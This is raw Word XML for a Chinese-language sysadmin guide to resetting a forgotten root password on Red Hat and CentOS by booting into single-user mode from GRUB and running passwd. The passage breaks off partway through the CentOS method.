    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Redhat</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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第一步：重启进入系统引导界面</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="4238625"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="215" name="图片 215" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630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descr="说明: http://www.linuxidc.com/upload/2014_02/14022309263018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34025" cy="4238625"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第二步</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>按</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>键</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进入</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="4114800"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="214" name="图片 214" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630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 descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630182.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34025" cy="4114800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第三步：继续按</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>键</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进入</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="4133850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="213" name="图片 213" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630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4" descr="说明: http://www.linuxidc.com/upload/2014_02/14022309263018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34025" cy="4133850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第四步：选中</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel/vmlinuz-2.6.18-8.el5xem ro root=/dev/voGroup00 rhgb quiet </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>行按</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">E </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进入</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="4181475"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="212" name="图片 212" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630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3" descr="说明: http://www.linuxidc.com/upload/2014_02/14022309263018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34025" cy="4181475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第五步：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关键步骤</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后面加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> single</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="4133850"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="211" name="图片 211" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630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2" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630185.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34025" cy="4133850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第六步：按</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>重新引导进入</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="3552825"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="210" name="图片 210" descr="说明: http://www.linuxidc.com/upload/2014_02/1402230926301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1" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630186.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34025" cy="3552825"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>第七步：在</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">sh-3.2# </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">passwd </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>按</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">enter </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进入</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="3667125"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="209" name="图片 209" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630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descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630187.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34025" cy="3667125"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第八步：在</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">New UNIX password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>处</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即可输入</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的新密码</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noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="3924300"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="208" name="图片 208" descr="说明: http://www.linuxidc.com/upload/2014_02/1402230926301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descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630188.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34025" cy="3924300"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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sidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>第九步：</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="00100A12">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>密码修改成功后即可看到</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRPr="00100A12" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFC"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="330" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5534025" cy="733425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="207" name="图片 207" descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630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descr="说明: http://www.linuxidc.com/upload/2014_02/140223092630189.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34025" cy="733425"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:pPr>
        <w:pStyle w:val="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Centos</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对于一个系统管理员来说</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码控制着相当多的安全数据。如果忘记了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码就需要及时的找回。下文中就为大家介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CentOS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码忘记的解决办法。希望这对记性的系统管理员来说有所帮助。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要有两个方法，这两个方法都十分简单。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法一：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在开机启动的时候能看到引导目录，用上下方向键选择你忘记密码的那个系统，然后按“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来你可以看到如下图所示的画面，然后你再用上下键选择最新的内核，然后在按“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行完上步操作后可以看到下面的画面，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rhgb quiet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后加“空格”，然后键入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>single</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，或者直接输入数字的“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”并回车确定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85"/>
    <w:p w:rsidR="00D35B85" w:rsidRDefault="00D35B85" w:rsidP="00D35B85">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>按“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
